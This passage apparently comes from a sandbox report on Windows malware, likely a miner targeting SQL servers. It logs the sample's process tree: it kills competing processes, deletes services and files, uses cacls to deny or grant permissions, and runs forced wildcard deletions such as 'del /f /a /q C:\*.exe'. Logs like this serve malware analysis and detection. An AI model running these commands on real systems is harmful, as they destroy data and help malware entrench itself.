cmd /c del /f /a /q %ProgramFiles%\Microsoft SystelApp\Systen64.exe
2⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SystelApp\Systen64.exe
2⤵
PID:1240

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im AppVNice.exe
2⤵
PID:3180

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystelApp\Systen64.exe
2⤵
PID:1196

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Norporati Windows AppVNice"
2⤵
PID:1016

C:\Windows\SysWOW64\sc.exe
sc delete "Norporati Windows AppVNice"
3⤵
PID:2288

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Norporati Windows AppVNice"
2⤵
PID:3240

C:\Windows\SysWOW64\sc.exe
sc delete "Norporati Windows AppVNice"
3⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im taskger.exe
2⤵
PID:1428

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskger.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\taskger.exe
2⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\taskger.exe
2⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im taskmgzr.exe
2⤵
PID:2456

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgzr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\taskmgzr.exe
2⤵
PID:3964

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\taskmgzr.exe
2⤵
PID:3036

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\vget.vbs
2⤵
PID:2820

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\vget.vbs
2⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im assm.exe
2⤵
PID:3832

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im assm.exe
3⤵
- Kills process with taskkill
PID:2820

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls assm.exe /t /e /c /d everyone
2⤵
PID:1812

C:\Windows\SysWOW64\cacls.exe
Cacls assm.exe /t /e /c /d everyone
3⤵
PID:3236

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies GthUdTask"
4⤵
PID:4736

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls assm.exe /t /e /c /d system
2⤵
PID:3836

C:\Windows\SysWOW64\cacls.exe
Cacls assm.exe /t /e /c /d system
3⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SqlManagement.exe
2⤵
PID:1300

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SqlManagement.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SqlManagement.exe /t /e /c /d system
2⤵
PID:3960

C:\Windows\SysWOW64\cacls.exe
Cacls SqlManagement.exe /t /e /c /d system
3⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SystemManagement.exe
2⤵
PID:3384

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SystemManagement.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
4⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SqlManagement.exe /t /e /c /d everyone
2⤵
PID:2912

C:\Windows\SysWOW64\cacls.exe
Cacls SqlManagement.exe /t /e /c /d everyone
3⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SystemManagement.exe /t /e /c /d everyone
2⤵
PID:3364

C:\Windows\SysWOW64\cacls.exe
Cacls SystemManagement.exe /t /e /c /d everyone
3⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SystemManagement.exe /t /e /c /d system
2⤵
PID:4056

C:\Windows\SysWOW64\cacls.exe
Cacls SystemManagement.exe /t /e /c /d system
3⤵
PID:4496

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls msinfo.exe /t /e /c /d everyone
2⤵
PID:3204

C:\Windows\SysWOW64\cacls.exe
Cacls msinfo.exe /t /e /c /d everyone
3⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im msinfo.exe
2⤵
PID:2340

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im msinfo.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im rundlls.exe
2⤵
PID:4060

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundlls.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls msinfo.exe /t /e /c /d system
2⤵
PID:3456

C:\Windows\SysWOW64\cacls.exe
Cacls msinfo.exe /t /e /c /d system
3⤵
PID:4552

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoy.exe
2⤵
PID:2764

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoy.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls OmdBase.exe /t /e /c /d system
2⤵
PID:884

C:\Windows\SysWOW64\cacls.exe
Cacls OmdBase.exe /t /e /c /d system
3⤵
PID:4812

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls System.exe /t /e /c /d everyone
2⤵
PID:868

C:\Windows\SysWOW64\cacls.exe
Cacls System.exe /t /e /c /d everyone
3⤵
PID:4840

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im System.exe
2⤵
PID:1228

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im System.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im OmdBase.exe
2⤵
PID:2356

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im OmdBase.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4848

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spoolys.exe
2⤵
PID:2036

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolys.exe
3⤵
- Kills process with taskkill
PID:4436

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls System.exe /t /e /c /d system
2⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
Cacls System.exe /t /e /c /d system
3⤵
PID:4760

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows DVD Maker"
2⤵
PID:3556

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows DVD Maker"
3⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows DVD Maker"
2⤵
PID:3964

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows DVD Maker"
3⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft Maker\OmdBase.exe
2⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im GthUdTask.exe
2⤵
PID:3600

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im GthUdTask.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4328

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft Maker\OmdBase.exe
2⤵
PID:2656

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft Maker\OmdBase.exe
2⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im BthUdTask.exe
2⤵
PID:4308

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BthUdTask.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies BthUdTask"
2⤵
PID:4372

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies BthUdTask"
3⤵
PID:1920

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SvidaPctb.exe
2⤵
PID:4636

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SvidaPctb.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4500

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SvidaPctb\SvidaPctb.exe
2⤵
PID:4928

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SvidaPctb\SvidaPctb.exe
2⤵
PID:4920

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SvidaPctb\SvidaPctb.exe
2⤵
PID:4908

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies WavesSys"
2⤵
PID:5116

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies WavesSys"
3⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies WavesSys"
2⤵
PID:5108

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies WavesSys"
3⤵
PID:4880

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im WavesSys.exe
2⤵
PID:5088

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WavesSys.exe
3⤵
- Kills process with taskkill
PID:4828

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
3⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im System.exe
2⤵
PID:1304

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im System.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft StuSystem\System.exe
2⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft StuSystem\System.exe
2⤵
PID:2080

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Nvdxgiwrap"
2⤵
PID:4544

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Nvdxgiwrap"
3⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Rsytvcem"
2⤵
PID:2776

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Rsytvcem"
3⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Rsytvcem"
2⤵
PID:3392

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Rsytvcem"
3⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Nvdxgiwrap"
2⤵
PID:4576

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Nvdxgiwrap"
3⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Nvdxgiwrap.exe
2⤵
PID:4768

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nvdxgiwrap.exe
3⤵
- Kills process with taskkill
PID:2284

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft StuSystem\System.exe
2⤵
PID:1040

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies BthUdTask"
2⤵
PID:4364

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft BthUdTask\BthUdTask.exe
2⤵
PID:4356

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Rsytvcp.exe
2⤵
PID:3492

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rsytvcp.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft BthUdTask\BthUdTask.exe
2⤵
PID:4348

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft BthUdTask\BthUdTask.exe
2⤵
PID:4340

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies GthUdTask"
2⤵
PID:3236

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies GthUdTask"
2⤵
PID:1112

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft GthUdTask\GthUdTask.exe
2⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft GthUdTask\GthUdTask.exe
2⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft GthUdTask\GthUdTask.exe
2⤵
PID:3036

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls OmdBase.exe /t /e /c /d everyone
2⤵
PID:416

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im OmdBase.exe
2⤵
PID:1028

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls conhoy.exe /t /e /c /d system
2⤵
PID:3188

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls conhoy.exe /t /e /c /d everyone
2⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls rundlls.exe /t /e /c /d system
2⤵
PID:3348

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls rundlls.exe /t /e /c /d everyone
2⤵
PID:4068

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft Rsytvcem\Rsytvcp.exe
2⤵
PID:3456

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Systen64.exe
2⤵
PID:4756

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft Rsytvcem\Rsytvcp.exe
2⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft Rsytvcem\Rsytvcp.exe
2⤵
PID:3128

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystenApp\Systen64.exe
2⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spoolys.exe
2⤵
PID:4464

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolys.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4660

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SystenApp\Systen64.exe
2⤵
PID:1368

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SystenApp\Systen64.exe
2⤵
PID:4064

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\Help\spoolys.exe
2⤵
PID:3976

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:416

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im lsma12.exe
2⤵
PID:3220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4736

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im lsma12.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\INF\aspnet\lsma12.exe
2⤵
PID:3980

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im assm.exe
2⤵
PID:516

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im assm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe
2⤵
PID:4720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe
2⤵
PID:4212

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im sqlcmd.exe
2⤵
PID:4128

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlcmd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe
2⤵
PID:4908

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4760

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe
2⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhos.exe
2⤵
PID:2260

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhos.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhos.exe
2⤵
PID:4656

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhos.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhou.exe
2⤵
PID:4732

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhou.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhou.exe
2⤵
PID:4824

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhou.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im m6.bin.bin.exe
2⤵
PID:4840

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4544

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im m6.bin.bin.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im javaw.exe
2⤵
PID:4816

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im javaw.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3456

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im clsso.exe
2⤵
PID:3488

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im clsso.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
PID:1300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
PID:4600

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5048

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
PID:4696

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
PID:2796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3976

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoy.exe
2⤵
PID:608

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoy.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoy.exe
2⤵
PID:5004

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoy.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im csrs.exe
2⤵
PID:4236

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im csrs.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4200

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im csrs.exe
2⤵
PID:3004

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im csrs.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4784

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
3⤵
PID:4196

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im sysdo.exe
2⤵
PID:4680

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sysdo.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im sysdo.exe
2⤵
PID:3500

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sysdo.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SqlManagement.exe
2⤵
PID:4704

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SqlManagement.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3944

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sSqlManagement.exe
2⤵
PID:684

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SqlManagement.exe
2⤵
PID:4888

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SystemManagement.exe
2⤵
PID:2768

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SystemManagement.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe
2⤵
PID:4668

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe
2⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\*
2⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im taskmgr.exe
2⤵
PID:3928

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3416

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.json
2⤵
PID:2240

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.bat
2⤵
PID:2460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.txt
2⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.ini
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.dll
2⤵
PID:4324

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\*.exe
2⤵
PID:4944

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.vbs
2⤵
PID:4616

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.vbs
2⤵
PID:2392

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.dll
2⤵
PID:2856

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.txt
2⤵
PID:372

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.bat
2⤵
PID:3680

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.json
2⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.ini
2⤵
PID:4668

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\*.exe
2⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/*.exe
2⤵
PID:2468

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.ini
2⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.json
2⤵
PID:3504

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.bat
2⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.txt
2⤵
PID:60

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.dll
2⤵
PID:4316

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.vbs
2⤵
PID:4624

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im wscript.exe
2⤵
PID:4280

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wscript.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWD.exe
2⤵
PID:3172

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWD.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWA.exe
2⤵
PID:1908

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWA.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWB.exe
2⤵
PID:3668

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWB.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWC.exe
2⤵
PID:3748

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWC.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENAC.exe
2⤵
PID:3996

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENAC.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4816

